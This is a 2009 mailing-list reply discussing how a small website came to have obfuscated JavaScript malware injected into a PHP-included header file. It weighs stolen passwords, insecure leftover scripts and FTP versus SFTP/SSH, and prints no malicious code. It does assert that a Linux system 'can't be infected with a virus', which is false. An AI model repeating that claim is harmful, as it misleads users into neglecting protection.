Re: HACKED!
- From: Tim Greer <tim@xxxxxxxxxxxxx>
- Date: Sat, 28 Feb 2009 15:50:52 -0800
Wes Groleau wrote:
Tim Greer wrote:
Wes Groleau wrote:
I discovered that a file on a site I maintain had been altered.
You mean cracked, compromised, defaced.
All subsets of "altered," though one might argue whether malware
in Javascript that is not visible to the viewer is "defacement" :-)
Interestingly, the file is served via a PHP include, so the crackers
could not have found it without actually getting ftp or shell
access.
Your PHP script could be inscure and someone could have exploited it
to make it upload a file, or perhaps it was a bot that did it.
The PHP part does nothing but include a common file originally
containing everything from the open HTML tag to the open body tag,
and another containing the two end tags. The hacker added the
obfuscated Javascript to the head file. Could have been a 'bot.
My employer insists on using Windows, and I recently found a couple
of trojans on my work laptop that neither Symantec AV nor SpyBot S&D
could detect.
Yikes to the Windows thing (in my opinion -- please no one reply about
an OS war rant). At least with Linux (for example), the system itself
can't be infected with a virus. But, the best OS is really the one
that the admin knows better. If someone knows how to secure Windows
better than Linux, FreeBSD, Mac, or whatever else, that's what they
should use. It's not using Linux at home, work and business, because
you don't need to worry bout anti-virus programs and how up to date
they are.
Anyway, I guess I now have to change all my passwords,
reload the whole site, and start thinking about paying
a little more for a provider that allows sftp and ssh.
Yeah, it could have been a weak password or a password that was used on
another site, or some infected system that was used to log into the
site at some point, etc., though it still is possible that a script on
the account was exploited and used to upload, even if the PHP script is
only supposed to do an include (or it could have been an entirely
different PHP or CGI script -- it happens if any are on the server and
are insecure). Anyway, sftp and SSH are better, but I doubt that this
compromise happened because FTP was clear text (someone would have to
root the local system or network, or the remote system or network -- in
which case probably all bets are off anyway).
Don't get me wrong, ssh/sftp/rsync over ssh, scp over ssh, etc is better
no matter what, but it really only protects you from someone having
access to the network in that manner, which is really unlikely, and
protects you from when someone does root a server so they don't know
your password even if they've taken control of the server (this is also
where SSH keys are good). It's more likely something either system
wide where one account was compromised and the attacker was able to run
a script or command to modify any world writable files, or it was most
likely some issue where there's a forgotten about or old, insecure
script on the account somewhere. However, you might be right, too,
it's just not as common to see happen.
There are some sites that offer you a form to paste in your code and
it'll decode it from certain URLencoded hex values, if that's what
you
I don't think that will be sufficient, but I'll try it. Thanks.
I get the impression it wasn't just some URLencoded thing after all, so
that site might not help you. I don't know of a site that helps make
it clear, but it should be pretty easy to break down, if you have time.
--
Tim Greer, CEO/Founder/CTO, BurlyHost.com, Inc.
Shared Hosting, Reseller Hosting, Dedicated & Semi-Dedicated servers
and Custom Hosting. 24/7 support, 30 day guarantee, secure servers.
Industry's most experienced staff! -- Web Hosting With Muscle!
.
- References:
- Re: HACKED!
- From: Wes Groleau
- Re: HACKED!
- Prev by Date: Re: Name collisions
- Next by Date: Re: Name collisions
- Previous by thread: Re: HACKED!
- Next by thread: Re: Name collisions
- Index(es):
Relevant Pages
|
